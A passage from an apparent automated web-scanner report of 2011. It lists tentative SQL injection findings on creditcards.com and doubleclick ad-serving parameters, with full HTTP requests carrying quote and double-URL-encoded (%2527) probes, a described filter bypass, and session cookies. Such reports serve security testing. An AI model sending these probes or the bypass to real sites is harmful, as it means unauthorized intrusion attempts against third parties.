U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=TYPE%3Abusiness&pidt=1&oid=http%3A//www.creditcards.com/oc/%3Fpid%3D22034407%26pg%3D17%26pgpos%3D4&ot=A&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22034407&pg=17&pgpos=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311990921%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22034407%252526pg%25253D17%252526pgpos%25253D4%2526ot%253DA; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 12:15:45 GMT
Server: Omniture DC/2.0.0
Content-Length: 421
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/ccardsccdc-us/1 was not found on this server.</
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/ccardsccdc-us/1%00''/H.17/s91529709035530?AQB=1&ndh=1&t=17/5/2011%206%3A59%3A51%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22034407%26pg%3D17%26pgpos%3D4&r=http%3A//www.creditcards.com/business.php&cc=USD&xact=1012011061706595020302843&purchaseID=1012011061706595020302843&events=purchase%2Cevent2&products=17%3B22034407%3B1%3B0&c9=6%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061706595020302843&v15=6%3A30AM&c16=4&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=17&v26=4&v28=lead%20confirmation&v29=17%3A22034407%7C4&v30=17%3A22034407&v31=22034407%7C4&v32=17%7C4&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=TYPE%3Abusiness&pidt=1&oid=http%3A//www.creditcards.com/oc/%3Fpid%3D22034407%26pg%3D17%26pgpos%3D4&ot=A&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22034407&pg=17&pgpos=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311990921%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22034407%252526pg%25253D17%252526pgpos%25253D4%2526ot%253DA; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 12:15:45 GMT
Server: Omniture DC/2.0.0
xserver: www284
Content-Length: 0
Content-Type: text/html

1.6. http://googleads.g.doubleclick.net/pagead/ads [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24%2527
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24%2527%2527
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.7. http://googleads.g.doubleclick.net/pagead/ads [biw parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The biw parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the biw parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the biw request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049%2527&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049%2527%2527&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.8. http://googleads.g.doubleclick.net/pagead/ads [dtd parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The dtd parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the dtd parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the dtd request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397%2527&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397%2527%2527&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.9. http://googleads.g.doubleclick.net/pagead/ads [ifi parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The ifi parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ifi parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1'&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1''&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.10. http://googleads.g.doubleclick.net/pagead/ads [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com&1'=1 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com&1''=1 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.11. http://googleads.g.doubleclick.net/pagead/ads [u_cd parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The u_cd parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_cd parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the u_cd request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32%2527&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32%2527%2527&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.12. http://googleads.g.doubleclick.net/pagead/ads [u_cd parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

Request 1

